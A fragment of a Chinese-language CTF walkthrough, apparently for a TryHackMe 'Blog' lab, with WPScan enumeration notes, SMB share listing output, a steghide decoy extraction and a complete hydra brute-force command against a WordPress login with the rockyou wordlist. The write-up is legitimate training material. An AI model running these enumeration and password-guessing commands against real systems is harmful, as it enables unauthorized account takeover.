- ap = All Plugins //ap = 所有插件 - at = All Themes //at = 所有主题 - dbe = Database Exports //dbe = 数据库导出 - cb = Config Backups //cb = 配置备份 - u = Enumerate Users //u = 枚举用户 - Detection-Mode = //Since we’re not worried about being detected we can use aggressive mode which occasionally delivers more results at the cost of generating more noise. 检测模式 = 由于我们不担心被检测到,因此我们可以使用主动模式,该模式偶尔会产生更多结果,但会产生更多噪音
没啥用
smbclient -L 10.10.244.229 Password for [WORKGROUP\root]:
Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers BillySMB Disk Billy's local SMB Share IPC$ IPC IPC Service (blog server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing.
Server Comment --------- -------
Workgroup Master --------- ------- WORKGROUP BLOG
然后看看BillySMB
┌──(root㉿kali)-[/tmp] └─# steghide extract -sf Alice-White-Rabbit.jpg Enter passphrase: wrote extracted data to "rabbit_hole.txt". ┌──(root㉿kali)-[/tmp] └─# cat rabbit_hole.txt You've found yourself in a rabbit hole, friend.
唉,太卡了,完全没有想做的欲望 hydra -l kwheel -P /usr/share/wordlists/rockyou.txt blog.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username"
